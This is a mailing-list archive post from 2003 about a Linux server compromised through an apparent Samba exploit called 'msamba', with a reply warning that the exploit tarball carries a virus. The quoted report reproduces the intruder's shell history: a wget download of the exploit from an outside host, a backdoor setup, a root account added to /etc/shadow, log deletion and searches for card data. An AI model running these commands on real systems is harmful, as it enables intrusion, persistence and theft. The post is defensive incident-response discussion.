Security Incidents mailing list archives
Re: msamba
From: "William Salusky" <change () dmzs com>
Date: Tue, 22 Apr 2003 05:20:00 -0000
Just in case anyone gets the great idea of downloading this tar.gz and check it out for themselves, beware! These binaries are infected with a variant of the linux.jac virus. If these binaries executed on your machine with root privs, you are hosed for 'plenty' of other reasons than just being rooted. Remember to always AV scan binaries obtained in the wild, and never examine binaries in an environment that you can't throw away(or reboot). use FIRE... http://fire.dmzs.com W Steve Bromwich <incident () fop ns ca> said:
Hi, Has anyone seen an msamba exploit? A client of mine was cracked last night using this. Whoever it was configured it to erase everything after a reboot (I got in in time to see a lot of rm -rf and killed the box). I've now reinstalled and restored the data, but I suspect the script kiddie is trying to get in again. He was nice enough to leave a .bash_history in /root: ps -aux w find // | grep *db find // | grep *.db find // | grep index.html cd /var/www ls -al cd tracking ls -al cd files ls -al cd /usr/share/sgml/docbook/stylesheet/dsssl/modular/images ls -al exit cd /usr/share/doc ls -al cd /var/www ls -al find // | grep *.log cd tracking ls -al cd files ls -al find // | grep index.* find // | grep shop.mdb find // | grep *.mdb exit cd /var locate order.log locate order.txt locate mdb locate metacart locate card cd www echo "qe3 wuzz here uid=0">about_us.html ps -aux cd /etc/init.d ls -al ./apache reload ps -aux cd /usr/etc ls -al / df cd /opt ls -al wget cahcepu.net/dhegleng/msamba.tar.gz pstree -p chmod 555 /tmp chmod 555 /var/tmp chmod 555 /var/vbox /usr/sbin/lsof |grep LISTEN /sbin/fuser -n tcp 23 w dir tar xzvf 73.tgz cd " " dir ls cd .. dir cd evil ./setup muie 55055 angelboy () the-darkside info w passwd daemon passwd daemon echo uid:x:0:0::/:/bin/bash >> /etc/shadow passwd $uid w locate .log rm -rf /var/log/ chmod 555 /tmp chmod 555 /var/tmp w pstree -p I picked up the copy of msamba and had a look at it; it looks like it's exploiting the recent samba bug for a wide variety of platforms (*BSD, SuSE, Slackware, Redhat, Mandrake, Gentoo and Debian). There's a tag in there that says "*** JE MOUET JE MUIL HOUWE - qe3" which I think might be Dutch (and I think, based on scans I'm seeing, the guy might be coming in from an IP registered to cyberangels.nl, but I don't have any hard proof). Mail is being sent to slamet_irdak () yahoo com once the exploit gets in, with output from uname -a and id being sent. The datestamp on the files are 18 April 08:43, which makes me think this might be close on a zero day exploit. I can't find anything about msamba googling around, either. The only other hint I had was the client mentioned there was "a lot of stuff about gzip running out of memory on the screen". Unfortunately I don't have the data from the drive to do any forensics on; as /var/log had been deleted it wasn't felt justified to go in deeper, and I just reformatted and reinstalled. Anyone else seen this? I'd like to make sure I've got everything tied down enough that this won't happen again. Samba wasn't supposed to be on there, and it's now been removed. I have a suspicion ssl might have been involved too, due to the gzip comment and the way apache was reloaded. Cheers, Steve ---------------------------------------------------------------------------- Attend Black Hat Briefings & Training Europe, May 12-15 in Amsterdam, the world's premier event for IT and network security experts. The two-day Training features 6 hand-on courses on May 12-13 taught by professionals. The two-day Briefings on May 14-15 features 24 top speakers with no vendor sales pitches. Deadline for the best rates is April 25. Register today to ensure your place. http://www.securityfocus.com/BlackHat-incidents ----------------------------------------------------------------------------
-- William Salusky change () dmzs com cell: 415-747-6775 ---------------------------------------------------------------------------- Attend Black Hat Briefings & Training Europe, May 12-15 in Amsterdam, the world's premier event for IT and network security experts. The two-day Training features 6 hand-on courses on May 12-13 taught by professionals. The two-day Briefings on May 14-15 features 24 top speakers with no vendor sales pitches. Deadline for the best rates is April 25. Register today to ensure your place. http://www.securityfocus.com/BlackHat-incidents ----------------------------------------------------------------------------
Current thread:
- msamba Steve Bromwich (Apr 21)
- Re: msamba Paulo Abrantes (Apr 21)
- Re: msamba William Salusky (Apr 22)
- Re: msamba noconflic (Apr 22)
- Re: msamba Nikola Pepelishev (Apr 22)
- Re: msamba Steve Bromwich (Apr 22)
- Re: msamba noconflic (Apr 23)
- Re: msamba Tobias Klein (Apr 25)
- Re: msamba noconflic (Apr 23)